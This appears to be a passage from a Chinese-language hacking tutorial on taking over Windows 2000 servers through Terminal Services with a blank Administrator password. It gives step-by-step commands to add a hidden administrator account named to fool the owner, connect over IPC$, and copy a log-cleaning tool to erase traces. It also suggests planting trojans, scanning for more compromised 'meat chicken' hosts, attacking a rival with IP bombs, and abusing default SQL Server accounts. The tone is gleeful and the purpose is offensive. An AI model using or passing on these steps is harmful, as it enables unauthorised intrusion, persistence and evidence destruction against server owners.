二.运行你的终端服务客户端，填上这个IP，按“连接”，等一下就看到了熟悉的WIN2000终端登陆界面，好，填上用户名：Administrator，口令不用填啦，按“确定”，等一下，哈哈！！！！！进去啦~~~~你会先看到一个叫你设定伺服器的画面，关掉，不要了。想干什么？首先我们为了防止管理员以后改了密码，我们先要给自己做一个管理员的帐户，点对方屏幕的开始--》程序--》附件--》命令提示符（这里的字有时是不同的，要看具体是什么系统，自己好好看看吧），依次输入：　 C:\>net user owem lgg1234 /add（加入一个用户名为owem,密码：lgg1314的帐户）　 指令执行成功。　 C：\>net localgroup administrators owem /add(把owem加入到管理员组）　 指令执行成功。　 好了！到这里你已增加了一个管理员了，以后就算他把Administrator的密码改了你也可以用owem这个帐户进去耍啦，建议你先用net user看看人家的管理组有多少人，人多的话就尽管加个号吧，人少的加号时就要找一个近似于对方的名字来迷惑管理员，哈哈~`够绝了吧！　 再来，在自己的命令提示符下依次输入：　 D:\hacker>net use \\211.**.**.53\ipc$ "lgg1314" /user:"owem"(用IPC管道连接上去）　 命令成功完成。　 D:\hacker>copy CleanIISLog.exe \\211.**.**.53\c$(把CleanIISLog.exe拷到对方对方C盘下，有时会拒绝访问的，就拷到其他目录下吧）　 已复制 1 个文件。　 你也可以把木马拷上去，哈哈！~~~有意思！！5555555555.....　 再来删除IPC的连接　 D:\hacker>net use \\211.**.**.53\ipc$ /delete　 \\211.**.**.53\ipc$ 已经删除。　 先去看看管理员在不在，开始--》程序--》系统管理工具--》终端服务管理员，哈哈！`~没在！爽极啦，只有你一个连线！　 下面该玩点什么呢？打开他的浏览器，去你知道的黑软地址下载你想用的工具，什么？装个流光？哈哈！~~`目标太大了吧？还是下个X-SCAN算了，下个IP炸弹？？呵呵！好主意，`炸你的情敌去吧！用他下载的X-SCAN帮你去找更多的肉鸡！1YEAH！如果你在上面运行了程序，你退出时就只关终端窗口右上角的X就行了，关掉后你的程序还在运行呢！明天睡醒了来收你的战果吧！如果你要全部退出，就按开始--》关机--》登出****（你的帐户）。　 还要补充的就是如果你扫到的是：SQL-SERVER默认帐户，没有NT管理员弱口令，但3389还是开了的话，就可以用SQLEXEC。EXE来连接上去，建立帐户也是用一样的命令，你也可以用3389登陆上去啦。